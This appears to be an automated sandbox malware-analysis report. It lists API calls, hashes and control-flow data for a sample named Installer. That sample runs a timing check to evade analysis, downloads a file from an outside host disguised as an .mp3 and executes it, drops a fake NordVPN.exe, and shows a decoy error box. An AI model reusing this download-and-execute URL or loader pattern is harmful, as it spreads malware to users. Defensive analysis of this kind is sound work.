                                                                                                                                        • Opcode ID: 9f55b42f01fb3fce49e125e5179612b9ae0586f8c61e00117f1b3586b850b5b4
                                                                                                                                        • Instruction ID: bcef055de6544ab86e3f01d6541baf16eee4f75703a229c9bc9e3fdb54bb89de
                                                                                                                                        • Opcode Fuzzy Hash: 9f55b42f01fb3fce49e125e5179612b9ae0586f8c61e00117f1b3586b850b5b4
                                                                                                                                        • Instruction Fuzzy Hash: 3F31163363168186CB249F25D4487A93360F7C8FE6F840227EE9E47394CB34C466C708
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: 6f5b531aff087c2ebc78838147812a0dd9008a5b8bbb438f555252cdaa7e1391
                                                                                                                                        • Instruction ID: 072de1fef1e9d89f3ae4f14eefdf1297cff1548ed416b1daf56dc8d53476fded
                                                                                                                                        • Opcode Fuzzy Hash: 6f5b531aff087c2ebc78838147812a0dd9008a5b8bbb438f555252cdaa7e1391
                                                                                                                                        • Instruction Fuzzy Hash: C5212623231A8185DF15AF27EC557296394BB46B94F5C8024EF1D1B381DF74C8E5CB12
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1534225298-0
                                                                                                                                        • Opcode ID: b7b3d86ca9d0ee98e9ac9d5869928a27b925779286116f2bfc51b6128a8ccc63
                                                                                                                                        • Instruction ID: d4bce9e0d000823ef00c839f1efaf485dcd5408272f787deed29208f56f98a46
                                                                                                                                        • Opcode Fuzzy Hash: b7b3d86ca9d0ee98e9ac9d5869928a27b925779286116f2bfc51b6128a8ccc63
                                                                                                                                        • Instruction Fuzzy Hash: F021C737A32A9485CB19EF26D410729B361E784FE8B588225EF6D0B399DF38DC52C750
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0025779B
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 002577A7
                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0025783C
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 00257848
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3168844106-0
                                                                                                                                        • Opcode ID: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                        • Instruction ID: 7799a3411f9d24799a890f5985c0a52e214a427bdedbbcbace885925c7131182
                                                                                                                                        • Opcode Fuzzy Hash: 905f98d841eae4ab66d526709c79df53eb5328ecb6ed6fba7ada2edbd53a37aa
                                                                                                                                        • Instruction Fuzzy Hash: 2D212576714B4097DB609F2AE9882597370F748B99F285122DF4D47B14DF38D8B9C704
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$ExceptionThrowmalloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2043655614-0
                                                                                                                                        • Opcode ID: 779c0c564eeed976b379d0b88b0281f01fd9342aabb37c0977b3cda53945716d
                                                                                                                                        • Instruction ID: f52bf1baf11c5f7b073073e048b6528623c33c587a011834dce8d47262835d6d
                                                                                                                                        • Opcode Fuzzy Hash: 779c0c564eeed976b379d0b88b0281f01fd9342aabb37c0977b3cda53945716d
                                                                                                                                        • Instruction Fuzzy Hash: C1119072221B8081CF24DF25E84121D73A5FBD5BE0F608226AB9D077A9DF38C8E5CB40
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                        • Instruction ID: 41ab9eccc4851b297d725a93deb847a127aabc816859870d3d7993bf299ee449
                                                                                                                                        • Opcode Fuzzy Hash: 26e0d05632ee771259b6d8779e1bb14a2af1a10e0c5519a103b38d64912a3de7
                                                                                                                                        • Instruction Fuzzy Hash: 9701F9BA32A75145EF04AF269C693A422559B15FC4FD94430CE0957385FF78C966C300
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                        • Instruction ID: b6fc116415098e705aea1a543e74987d8531cb222409fef1a8ce4ab76a4ada29
                                                                                                                                        • Opcode Fuzzy Hash: ebbf41f14a031a46e4a55ff2dc776043666cb55a5837aa6e1a48b56d902b4385
                                                                                                                                        • Instruction Fuzzy Hash: 4F01D2A632674141EB04BF22AC593B822559B0AFD4F958431CE4997345EB78CDA5C304
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                        • Instruction ID: 56727edbda00b9f671247e85e7257af7705026f7d16d47fc33614e131b79a74e
                                                                                                                                        • Opcode Fuzzy Hash: fea3fd7b45b55f817435c8431d97fe1bf12a638175959c43ee92c8fc165712c7
                                                                                                                                        • Instruction Fuzzy Hash: 8201F5A332574251EF04DF269C693A423259B49FC5FC5A421CE4A57346FF78CE6AC308
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1475443563-0
                                                                                                                                        • Opcode ID: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                        • Instruction ID: eda8a1fe169847e9e75246d2502bc3db2fdd0e04caca023572a90274bc200c1f
                                                                                                                                        • Opcode Fuzzy Hash: 3300147bea888004f54cd18b7a1711a170f8e79cb67e40ec15571cdf7fcd0c60
                                                                                                                                        • Instruction Fuzzy Hash: F501D2B232574191EF04EF2698693B423629B19FD4F958422DE0D97B45EF78CEA6C304
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                        • Instruction ID: 65e875e2d9435a865969b2fadf7feb1deb913679298286f136d90cd3c9a0b7bc
                                                                                                                                        • Opcode Fuzzy Hash: ea9aa8451205e714d2d2deee7ad544f8e48fe2026ff0a9e62e11d2d899170449
                                                                                                                                        • Instruction Fuzzy Hash: 4901B563330DD5C59629AD57D88052A6618AF41FE571D4155FF6D0B342DFA0C8A7C700
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                        • Instruction ID: 8f4b0468ce8212f1e50defae2fa0c9eefe9c4091782a24ac27e1f1164cd1a1f8
                                                                                                                                        • Opcode Fuzzy Hash: efa2551094f8694e9312fa94f2ef5c0b0e1a7981b61eb5219889216caf8af953
                                                                                                                                        • Instruction Fuzzy Hash: 6DF05E537219D4C98B14AE27DC911682368AF56BA8B5C4171BF1D0B756EE20CCF68710
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                        • Instruction ID: 4f0413f7738a6f26db24b8eab1a8b34e0ca206471f22ad8828a8529523f38822
                                                                                                                                        • Opcode Fuzzy Hash: d981d276683500439fe255ece07c6d20aa2690fecfcea96cff91bf552de1cfa0
                                                                                                                                        • Instruction Fuzzy Hash: 5AF0BE13B229C0CA8B14BE27EC901686368BF46BA475C0131FF1D0BB86DE20C8B68300
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2092602928.0000000000241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2092586394.0000000000240000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092642045.000000000028F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092666714.00000000002AC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2092680056.00000000002AF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_240000_7z.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                        • Instruction ID: 5e3c4c5dc71a1e0b3b4eee6afd7f64b13de371887dccc4e5a89f9229dab6679a
                                                                                                                                        • Opcode Fuzzy Hash: fffe1feea4d5eb521afbbdfec112adb7fa227329f3f82f7615eed68f37e3b42c
                                                                                                                                        • Instruction Fuzzy Hash: DDF0E9137218C0C9C715AE27DC8112953249F95FD875C4262FF2D0B356CE30CCE69700

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 251280-25128a call 251ab8
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00251285
                                                                                                                                          • Part of subcall function 00251AB8: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00251AC4
                                                                                                                                          • Part of subcall function 00251AB8: __RTC_Initialize.LIBCMT ref: 00251B0A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 002512C4
                                                                                                                                        • Sleep.KERNEL32(00009C40), ref: 002512CD
                                                                                                                                        • GetTickCount.KERNEL32 ref: 002512D3
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002512D9
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 002512F0
                                                                                                                                        • FindResourceW.KERNEL32(00000000,00000065,0000000A), ref: 00251314
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00251322
                                                                                                                                        • URLDownloadToFileA.URLMON(00000000,http://joxi.net/4Ak49WQH0GE3Nr.mp3,00000000,00000000,00000000), ref: 00251539
                                                                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 00251561
                                                                                                                                        • GetProcAddress.KERNEL32(SizeofResource), ref: 0025159A
                                                                                                                                        • LockResource.KERNEL32(?,?,?,\Microsoft\NordVPN.exe,00000016,00000000,00000001), ref: 002515B6
                                                                                                                                        • GetProcAddress.KERNEL32(VirtualProtect), ref: 0025168E
                                                                                                                                        • VirtualProtect.KERNEL32(?,0000077E,00000040,00000000,?,?,?,?,?,?,?,\Microsoft\NordVPN.exe,00000016,00000000,00000001), ref: 0025171F
                                                                                                                                        • Beep.KERNEL32(000001F4,000001F4), ref: 0025180F
                                                                                                                                        • MessageBoxA.USER32(00000000,Error!,Error!,00000010), ref: 00251823
                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0025184F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$AddressCountProcTick$BeepConcurrency::cancel_current_taskDownloadExecuteFileFindHandleInfoInitializeLoadLockMessageModuleProtectShellSleepSystemVirtualXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                                                                        • String ID: AGsftdwet$APPDATA$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$ET\Framework\v4.0.30319\RegSvcs.exe$MZx$SizeofResource$TAFstfdewtdwe$VirtualProtect$\Microsoft\NordVPN.exe$http://joxi.net/4Ak49WQH0GE3Nr.mp3$open$string too long
                                                                                                                                        • API String ID: 3062682576-3503651904
                                                                                                                                        • Opcode ID: 51072c0b70bc5af9f3b7133a4fc825fd89b82fba39b46fb4d96516faa1a8ec2a
                                                                                                                                        • Instruction ID: 4e74343b75258afa1d4fc4d6c798707f75548f0c011f871a836d9534bfd40776
                                                                                                                                        • Opcode Fuzzy Hash: 51072c0b70bc5af9f3b7133a4fc825fd89b82fba39b46fb4d96516faa1a8ec2a
                                                                                                                                        • Instruction Fuzzy Hash: 16F15831E142549FDB249F28CC49BADB7B5EF45301F1482E8E84DA7681DB746EA8CF84

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 4 251290-2512fd GetTickCount Sleep GetTickCount GetModuleHandleW GetSystemInfo 5 251805-251829 Beep MessageBoxA 4->5 6 251303-251309 4->6 7 25182e-251849 call 251d29 5->7 6->5 8 25130f-251375 FindResourceW LoadResource call 251100 call 256185 6->8 15 251378-25137d 8->15 15->15 16 25137f-2513e5 call 2518b0 * 2 15->16 21 2513eb-251453 16->21 22 25184a call 251280 16->22 23 2514df-251579 call 254370 * 2 URLDownloadToFileA ShellExecuteA 21->23 24 251459-251464 21->24 29 25184f call 2511e0 22->29 44 25158f-2515c2 GetProcAddress LockResource 23->44 45 25157b-25157d 23->45 27 251466-25146b 24->27 28 25146d-251474 24->28 31 251477-25148b 27->31 28->31 34 251854-251869 call 256048 29->34 35 25148d-251492 31->35 36 2514ba-2514bc 31->36 50 251892-2518a4 34->50 51 25186b-251874 34->51 35->29 41 251498-2514a3 call 251d37 35->41 37 2514d1 36->37 38 2514be-2514cf call 251d37 36->38 43 2514d3-2514d9 37->43 38->43 41->34 56 2514a9-2514b8 41->56 43->23 60 2515c4-2515ca 44->60 61 251620-25162f 44->61 49 251580-25158d 45->49 49->44 49->49 53 251876-251884 51->53 54 251888-25188f call 251fb8 51->54 58 2518a5-2518cc call 256048 53->58 59 251886 53->59 54->50 56->43 72 2518f4-2518fa 58->72 73 2518ce-2518d3 58->73 59->54 62 2515d0-2515e0 60->62 65 251630-251681 61->65 62->62 66 2515e2 62->66 65->65 68 251683-2516d0 GetProcAddress call 251100 65->68 69 2515e4-251604 66->69 81 2516d2-2516db 68->81 69->69 74 251606-25160e 69->74 79 251900-25190b 72->79 80 2519de call 251280 72->80 76 2518d5 73->76 77 2518d7-2518f1 call 254370 73->77 78 251610-25161e 74->78 76->77 78->61 78->78 84 251914-251921 79->84 85 25190d-251912 79->85 88 2519e3-2519e8 call 2511e0 80->88 81->81 86 2516dd-2516ea 81->86 90 251923-251928 84->90 91 25192a-25192f 84->91 89 251932-251946 85->89 92 2516f0-2516fa 86->92 94 25196d-25196f 89->94 95 251948-25194d 89->95 90->89 91->89 92->92 96 2516fc-25172d VirtualProtect 92->96 97 251971-25197a call 251d37 94->97 98 25197c 94->98 95->88 100 251953-251960 call 251d37 95->100 104 251735-251741 96->104 102 25197e-2519a1 call 254370 97->102 98->102 110 251962-25196b 100->110 111 2519d9 call 256048 100->111 121 2519a3-2519ae 102->121 122 2519cc-2519d6 102->122 106 251743-251752 104->106 107 251772-251796 104->107 112 251754-251762 106->112 113 251768-25176f call 251fb8 106->113 114 2517c9-2517d2 107->114 115 251798-2517a9 107->115 110->102 111->80 112->34 112->113 113->107 123 2517d4-2517e5 114->123 124 251801-251803 114->124 119 2517bf-2517c6 call 251fb8 115->119 120 2517ab-2517b9 115->120 119->114 120->34 120->119 127 2519b0-2519be 121->127 128 2519c2-2519c9 call 251fb8 121->128 129 2517f7-2517fe call 251fb8 123->129 130 2517e7-2517f5 123->130 124->7 127->111 132 2519c0 127->132 128->122 129->124 130->34 130->129 132->128
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 002512C4
                                                                                                                                        • Sleep.KERNEL32(00009C40), ref: 002512CD
                                                                                                                                        • GetTickCount.KERNEL32 ref: 002512D3
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 002512D9
                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 002512F0
                                                                                                                                        • FindResourceW.KERNEL32(00000000,00000065,0000000A), ref: 00251314
                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00251322
                                                                                                                                        • Beep.KERNEL32(000001F4,000001F4), ref: 0025180F
                                                                                                                                        • MessageBoxA.USER32(00000000,Error!,Error!,00000010), ref: 00251823
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountResourceTick$BeepFindHandleInfoLoadMessageModuleSleepSystem
                                                                                                                                        • String ID: AGsftdwet$APPDATA$Error!
                                                                                                                                        • API String ID: 3648297847-2510699627
                                                                                                                                        • Opcode ID: 45926d6406560769d4e26ef8e0c2600243e36a204ee0e81acc1638f382c6bc3a
                                                                                                                                        • Instruction ID: aeb608ab5134ae5fcee82133f433cf8d0e9a1640150adbb98c7ebc882863fd2a
                                                                                                                                        • Opcode Fuzzy Hash: 45926d6406560769d4e26ef8e0c2600243e36a204ee0e81acc1638f382c6bc3a
                                                                                                                                        • Instruction Fuzzy Hash: 96310F71E44314AFEB24AF64EC0DBA97BB8FB05715F0081A9F659A72C0DBB41954CF90

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 137 256b54-256b61 call 25b52d 140 256b83-256b8f call 256b96 ExitProcess 137->140 141 256b63-256b71 GetPEB 137->141 141->140 142 256b73-256b7d GetCurrentProcess TerminateProcess 141->142 142->140
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,00256B53,?,?,?,?), ref: 00256B76
                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00256B53,?,?,?,?), ref: 00256B7D
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00256B8F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
